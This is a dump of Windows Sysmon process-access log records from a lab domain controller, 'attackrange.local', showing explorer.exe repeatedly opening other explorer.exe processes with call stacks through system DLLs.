16:52:29.621{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235714Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235713Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235712Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235711Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235710Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235709Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235708Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235707Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235706Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235705Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235704Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235703Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235702Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235701Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235700Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235699Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235698Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235697Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235696Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235695Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235694Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235693Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235692Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235691Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235690Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235689Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235688Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.606{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235687Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 